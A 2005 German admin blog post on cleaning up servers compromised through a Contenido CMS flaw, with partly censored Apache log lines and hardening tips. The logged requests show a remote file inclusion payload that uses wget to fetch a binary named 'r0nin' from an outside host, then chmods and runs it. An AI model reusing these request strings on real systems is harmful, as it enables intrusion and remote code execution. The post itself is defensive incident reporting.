Wednesday, 14. December 2005
Die Brasilianer wieder ...
Der Bug im CMS Contenido ist zwar bereits gefixt, dennoch musste ich heut gleich auf 2 Servern die Spuren eines Einbruchs über genau dieses CMS löschen. Natürlich war mein Lieblingstool "r0nin" wieder mit am Start. Das zeigt mal wieder Eindrucksvoll, dass sich viele User einfach nicht für die installiere Anwendung interessieren, nachdem diese einmal installiert ist und läuft. Besonders schön konnte bzw. kann man das auch bei phpBB beobachten. Darüber wurden auch sehr viele Server infiltriert. Auf den entsprechenden Systemen wurde nun erst einmal "url_fopen" in der php.ini auf Off gesetzt. Die Admins freuts, viele Kunde störts natürlich wieder ... 
In Brasilien muss es sehr langweilig sein, ich würde bisher mind. 90% der "Hacks" auf unsere Server den südamerikanischen Kollegen zuordnen ...
Und so sieht das dann aus (zensiert):
Man kann schön erkennen, wie die Scripte/Binarys via wget nachgeladen werden und dann entsprechend die Rechte gesetzt werden. Man könnte ja auch wget auf root chown'en und chmod 0700 setzen, vielleicht ärgert das die lieben Hacker ein wenig ...
In Brasilien muss es sehr langweilig sein, ich würde bisher mind. 90% der "Hacks" auf unsere Server den südamerikanischen Kollegen zuordnen ...
Und so sieht das dann aus (zensiert):
www.*.de 201.19.165.xxx - - [13/Dec/2005:16:44:36 +0100] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=
http://*.aol.com.br/silvioet/tool25.png?&cmd=cd%20/dev/shm;wget%20http://*.no-ip.org/r0nin HTTP/1.1" 200 12494 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322)" "-"
www.*.de 201.19.165.xxx - - [13/Dec/2005:16:44:49 +0100] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=
http://*.aol.com.br/silvioet/tool25.png?&cmd=cd%20/dev/shm;chmod%20777%20r0nin HTTP/1.1" 200 12072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322)" "-"
www.*.de 201.19.165.xxx - - [13/Dec/2005:16:44:59 +0100] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=
http://*.aol.com.br/silvioet/tool25.png?&cmd=cd%20/dev/shm;./r0nin HTTP/1.1" 200 12106 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322)" "-"
Man kann schön erkennen, wie die Scripte/Binarys via wget nachgeladen werden und dann entsprechend die Rechte gesetzt werden. Man könnte ja auch wget auf root chown'en und chmod 0700 setzen, vielleicht ärgert das die lieben Hacker ein wenig ...
Suche
Kommentare
zu iTunes bald ohne DRM - und die anderen Probleme bleiben?
07.01.2009 09:58
Hi Frank
Ja keine Ahnung
, so unterschiedlich sind OSX
und Linux eigentlich nicht wir
klich.
Wahrscheinlich [...]
07.01.2009 09:58
Hi Frank
Ja keine Ahnung
, so unterschiedlich sind OSX
und Linux eigentlich nicht wir
klich.
Wahrscheinlich [...] zu iTunes bald ohne DRM - und die anderen Probleme bleiben?
07.01.2009 09:50
Ich versteh auch nicht warum d ie nicht endlich mal ein iTune s für Linux rausbringen. Unter MacOS X läuft der Mist [...]
07.01.2009 09:50
Ich versteh auch nicht warum d ie nicht endlich mal ein iTune s für Linux rausbringen. Unter MacOS X läuft der Mist [...]
zu 1984 aka 2009
03.01.2009 19:53
Exakt. ISP's, viele große Unte rnehmen oder auch Einrichtunge n der öffentlichen Verwaltung. Dieser Kundenkreis war [...]
03.01.2009 19:53
Exakt. ISP's, viele große Unte rnehmen oder auch Einrichtunge n der öffentlichen Verwaltung. Dieser Kundenkreis war [...]
zu 1984 aka 2009
03.01.2009 19:36
Du meinst weil BT überwiegend ISP's als Kunden hat, also z.B . Webhoster usw, die ja selbst diese Daten schon erfas [...]
03.01.2009 19:36
Du meinst weil BT überwiegend ISP's als Kunden hat, also z.B . Webhoster usw, die ja selbst diese Daten schon erfas [...]
zu 1984 aka 2009
03.01.2009 19:27
"Warum sollte das dann nicht a uch für andere Carrier, Provid er, Hoster etc. gelten?" We il BT einen sehr speziel [...]
03.01.2009 19:27
"Warum sollte das dann nicht a uch für andere Carrier, Provid er, Hoster etc. gelten?" We il BT einen sehr speziel [...]
Seitdem ich einen eigenen Webserver betreibe lese ich viele Logfiles . Regelmäßig fallen mir dabei im Apache-Log Einträge auf wie z. B.: 62.XX.XX.XX - - [26/Dec/2005:12:04:15 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (com
Aufgenommen: Dec 30, 19:39